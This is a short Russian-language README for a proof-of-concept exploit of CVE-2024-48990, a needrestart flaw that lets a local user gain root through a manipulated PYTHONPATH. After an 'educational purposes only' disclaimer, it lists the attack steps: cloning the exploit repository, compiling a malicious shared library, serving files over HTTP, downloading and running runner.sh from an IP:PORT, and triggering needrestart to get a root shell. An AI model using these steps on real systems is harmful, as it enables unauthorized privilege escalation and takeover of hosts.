
PoC о CVE-2024-48990. Qualys обнаружила, что needrestart до версии 3.8 позволяет локальным злоумышленникам выполнять произвольный код от имени root, обманом заставляя needrestart запускать интерпретатор Python с контролируемой злоумышленником переменной окружения PYTHONPATH. (NIST)
[!WARNING] Эти файлы и информация предназначены только для образовательных целей. Автор не несет ответственности за любые злонамеренные действия. Вся предоставленная информация не предназначена для подстрекательства к каким-либо преступлениям или злоупотреблениям.
Qualys обнаружила, что needrestart версии ниже 3.8 позволяет локальным злоумышленникам выполнять произвольный код с правами root, обманом заставляя needrestart запускать интерпретатор Python с контролируемой злоумышленником переменной окружения PYTHONPATH. Официальные подробности смотрите на NIST.
git clone https://github.com/grecosamuel/CVE-2024-48990.git
gcc -shared -fPIC -o __init__.so exploit.c
python3 -m http.server
wget http://IP:PORT/runner.sh
chmod +x runner.sh
./runner.sh
sudo needrestart
Когда увидите [*] CVE module created, нажмите CTRL+C, чтобы остановить процесс и получить свою оболочку!